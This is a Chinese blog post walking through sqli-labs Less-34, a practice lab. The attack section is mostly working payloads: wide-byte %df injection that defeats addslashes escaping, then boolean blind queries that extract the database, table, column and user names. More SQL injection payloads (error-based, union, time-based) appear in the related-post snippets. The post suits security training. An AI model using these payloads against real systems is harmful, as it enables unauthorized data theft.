SQL注入 Less34(POST型宽字节注入+布尔盲注)

已于 2022-07-28 19:18:29 修改
阅读量674 收藏 3
点赞数 3
文章标签: sql sql注入
于 2022-07-28 17:52:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/126032371
版权

前置知识:【Try to Hack】宽字节注入

在这里插入图片描述
尝试万能密码
' or 1#
在这里插入图片描述
进行了转义,使用宽字节注入
%df' or 1#
在这里插入图片描述
发现没有效果,并且%df直接显示出来了(之前都是显示不出来,是一个问号的图形)
抓包,发现对%进行了URL编码
1%25df%27+or+1%23

我们用burp进行宽字节注入即可
%df' or 1#

%df' or length(database())=8#

%df' or ascii(substr(database(),1,1))=115#

%df' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101#

%df' or ascii(substr((select column_name from information _schema.columns where table_name="users" limit 0,1),1,1))=105#

因为"users"用到了引号,使用子查询或者16进制方式(十六进制成功了,但子查询,出来点问题)
%df' or ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))=105#

%df' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=(select table_schema from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)),1,1))=105#

%df' or ascii(substr((select username from users limit 0,1), 1,1))=68#

开心星人
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
SQLi LABS Less-34
wangyuxiang946的博客
06-28 1万+
第三十四关注入点为 单引号字符串 , 注入类为 报错注入 此关卡通过 代码WAF 将单引号' 转义成 /', 我们使用 编译 绕过WAF , 先上结果 �' and updatexml(1,concat(0x7e, substr((select group_concat(schema_name) from information_schema.schemata),62,31) ),3) # �' and updatexml(1,concat(0x7e, substr((select..
sqli-labs (less-34)
kukudeshuo的博客
03-14 1507
sqli-labs (less-34) 进入34关,我们发现又回到了我们熟悉的页面,我们直接输入用户名和密码登入进去 像之前的关卡一样,我们输入的用户名和密码也是使用POST的方式传输到了服务器,所以我们继续使用hackbar工具抓取POST内容 在用户名的位置我们输入一个单引号试试,结果发现单引号被转义 那我们在密码的位置尝试输入一个单引号试试,结果发现也被转义 这里一般情况下就已经没有注入点了,但我们可以查看源代码看看这关是不是也使用了GBK编码 查看源代码可知确实使用了GBK编码,那就很简单
Sqli-labs之Less-34
m0_46315342的博客
06-04 771
                                          &nbs...
sqli-labs————Less-34(宽字节绕过、水平越权、盲注
Fly_鹏程万里
05-19 2495
Less-34方法一:这一关是POST的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: �'。我们可以利用这一点注...
SQL注入详解 32-37关
君莫hacker的博客
10-14 964
Less-32 确定注入类 查看当前数据库 爆表 爆列 爆数据 Less-33 确定注入类 查看当前数据库 爆表 爆列 爆数据 Less-34 确定注入类 查看当前数据库 爆表 爆列 爆数据 Less-35 确定注入类 查看当前数据库 爆表 爆列 爆数据 Less-36 确定注入类 查看当前数据库 爆表 爆列 爆数据 ...
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
超级SQL注入工具,支持布尔盲注,报错盲注,union注入等
最新发布
03-27
超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
SQL注入(+盲注).txt
10-13
SQL注入(+盲注).txt
sql注入 pikachu post数字注入
08-12
SQL 注入 Pikachu Post 数字注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字注入方法,即使用 ...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
注入漏洞一把嗦(原理+步骤+防御)
Y22Lee的博客
03-21 1210
以csdn为例,除去请求头信息,剩下的都是Head信息,其中U-A是用户的基本信息,Referer是用户的请求来源。没有回显的注入,SQL注入中最繁琐;因为没有明确的回显,所以不能直观的得到数据。只能尝试测出数据。一般盲注分为布尔盲注和时间盲注。宽字节是指占俩个以上字节的字符,而一般的字符只占一个字节,被称作单字节(窄字节)。ASCII:单字节编码GBK,UTF-8:单字节/双字节编码(区别根据范围划分,范围与ASCII保持一致)英文通常是默认占用一个字节,而汉字占用俩个字节!
SQL-labs的第34关——报错注入 宽字节注入POST
qq_73393033的博客
08-09 314
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法中和反斜杠。
宽字节注入
weixin_45634365的博客
02-28 530
一、魔术引号 有攻击必有防御 魔术引号属于SQL注入的防御,是PHP的一种防御手段,使用反斜线将单引号、双引号以及反斜线本身进行转义 单引号和双引号内的一切都是字符串,如果我们输入的东西不能闭合掉单引号和双引号,我们的输入就不会当作代码执行,就无法产生SQL注入 ' -> \' " -> \" \ -> \\ 魔术引号防护很常见,虽然魔术引号在PHP5.3.0后就被废除,5.4.0后就被移除,但是一般的CMS全部都有使用,有专门的魔术引号函数 魔术引号在低版本中默认开启,打开php.in
SQL靶场练习(包含字符、数字、宽字节、post
Lorezon的博客
01-13 549
一:字符注入 当输入的参数为字符串时,称为字符,需要用单引号来闭合。 初始页面是这样的: 第一步:判断注入类 1.在name=root 后添加一个单引号使之变为name=root',发现页面返回错误: 说明存在注入。 2.接下来构造语句name=root' and '1'=1--+',页面返回正常: 将and '1'=1改成and '1'=2,发现页面返回错误: 说明这里的注入是字符注入。...
Less 15-16(POST布尔注入)
老司机开代码的博客
08-03 353
文章目录1. 题目分析2. 注入过程less-16 1. 题目分析 首先分析页面,发现网站此时完全规避了报错信息。连双注入都不会再由报错信息提示到页面上。因此,我们无法通过报错的信息来获取网站的数据库信息。这是我们只能换一种思路—盲注。 通过多次尝试,我们发现,网站有两种响应状态,分别是successfully和failed。 那么我们可以知道,当条件语句为true的时候,就会返回successf...
sqli-labs】 less34 POST- Bypass AddSlashes (POST绕过addslashes() 函数的宽字节注入)
ajxi63204的博客
01-30 332
还是宽字节注入POST版本的 uname=1&passwd=1%df' union select 1,2,3# 提交报错 列名不匹配,改一下就好了 uname=1&passwd=1%df' union select 1,2# 看一下源码,果然只select了两个字段 转载于:https://www.cnblogs.com...
宽字节(宽字符)注入
zl20117的博客
12-13 2991
字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %
渗透测试之SQL注入POST的四种注入手法)、SQL注入绕过手段
Hi~ 土拨鼠
12-11 6783
文章目录使用BurpSuite进行post请求的抓包使用联合查询进行注入:使用报错注入进行注入:布尔盲注:时延查询:SQL注入绕过手段大小写字母绕过双写绕过编码绕过内联注释绕过 POST和GET的区别就是注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。当然可以借助对应的插件可以完成修改任务。 使用BurpSuite进行post请求的抓包 以Sqli-Lab Less11为例。 查看抓的包 将抓到的包发送到repeater模块,就可以进行重复测试了 初步判断sql语句大概为:select un
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值